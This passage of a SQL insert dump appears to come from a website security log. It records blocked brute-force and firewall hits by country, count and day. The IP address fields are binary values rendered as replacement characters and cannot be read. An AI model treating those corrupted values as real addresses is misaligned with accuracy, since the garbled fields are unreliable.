ute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����I�','IR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hݾ','BR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hݾ','BR',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hݾ','BR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hݾ','BR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�l','CL',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�l','CL',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����e','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����e','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����e','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����\\','JP',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���e�','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���w��','FR',2,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���z.�','CA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���z.�','CA',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����C-','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���ђ�','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���ђ�','IN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����@','NL',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����@','NL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����@','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����@','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����@','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����','TH',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����','TH',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0����','TH',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','UA',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','UA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����\\�','FI',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����\\�','FI',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����\\\\','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����','DE',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0����T','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����T','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���JL�','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���JL�','FR',2,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���JL�','FR',1,18883,'waf'),('\0\0\0\0\0\0\0\0\0\0���D??','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�\0','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�\0','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�\0','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���D��','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���D��','GB',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�	','GB',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�	','GB',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�	','GB',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�$','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����2','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����dl','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���ŃB','CA',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���ŃB','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���ŝ','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ū�','CA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ů�','CA',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���;!�','IN',3,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���;!�','IN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���;=�','IN',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���;=�','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���;=�','IN',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���;=�','IN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���;=�','IN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���;N�','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���;N�','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���;N�','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���;N�','IN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���;Rz','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���;S�','IN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���;U�','IN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���;u�','SG',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���;v�','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���;v�','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���;v�','SG',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0������','CN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','CN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','DE',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ŝ','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0����X�','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����X�','CN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ļ�','CN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���U��','RO',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���U��','RO',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����6','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����6','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���/�\"','CA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���/�\"','CA',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���/�\"','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�B','US',4,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�C','US',10,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�D','US',6,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�D','US',2,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�D','US',4,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�E','US',4,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�E','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�F','US',4,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',6,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',12,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',7,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�:','US',3,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�;','US',2,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�;','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�<','US',4,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�<','US',6,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�<','US',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�<','US',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�=','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�=','US',6,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�=','US',4,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�=','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�=','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�=','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�J','US',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�J','US',4,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�J','US',6,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�J','US',2,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�K','US',4,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�L','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�L','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�M','US',4,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�M','US',3,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�M','US',8,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�M','US',2,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�N','US',6,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���]]{','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���]]{','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���]]{','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���]]{','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���]]{','US',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���]]{','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���]c8','DE',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���]c8','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���]c8','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���]c8','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���]n\'','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���]��','CA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','CA',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���]��','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�`','IN',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���]��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���]��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���n�R','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���n��','IN',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���n��','IN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����6*','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ʊj','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���[J�','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���[J�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K	','DE',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K	','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K	','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K	','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K	','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���[L=','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���[a�','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���[a�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���[a�','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���[h�','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���[i�','DE',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�@','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�@','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���~߱','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����O�','US',2,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���ً','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���ً','CA',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0����8','CA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','FR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�\r','FR',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�\r','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����|','ID',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����|','ID',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����|','ID',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���B�r','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���HҌ','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���HҌ','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���HҌ','SG',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hӱ','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hӱ','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���Hӱ','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���8\Z�','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���8\Z�','CA',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���8\Z�','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0������','PL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0������','PL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0������','PL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����/�','FR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���鄙','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����;','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���_l�','VN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���_nq','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���_nq','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���_nq','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���_nq','VN',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���_pO','VN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���P��','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���j �','FR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���j �','FR',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���j �','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���j �','FR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���j#�','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���j#�','FR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���j#�','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���j#�','FR',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���j)','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���j)','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����:-','GB',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0�����=','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��� �A','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��� �A','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��� �A','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����','HK',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����A','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���C�u','CY',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���C�u','CY',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���C�u','CY',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���C�h','CY',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���/\"x','IN',1,18853,'waf'),('\0\0\0\0\0\0\0\0\0\0����D','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����vv','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���捫','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���捫','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����!p','GB',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����%�','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����%�','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����G�','NL',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����gI','IN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����n�','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����n�','IN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����-','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����f','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����f','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����f','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����J','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���:�3','IR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���:�L','IR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���:��','IR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���EF','CA',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0�����\\','ID',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����P�','RU',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���AA�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Avv','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���Avv','DE',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','IN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�O','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�O','NL',2,18857,'waf'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���Aێ','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���E��','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y�','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y�','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y�','DE',2,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y�','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y �','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y3�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y3�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���YY�','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���YcD','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y��','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����','CA',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',2,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',1,18882,'brute'),('\0\0\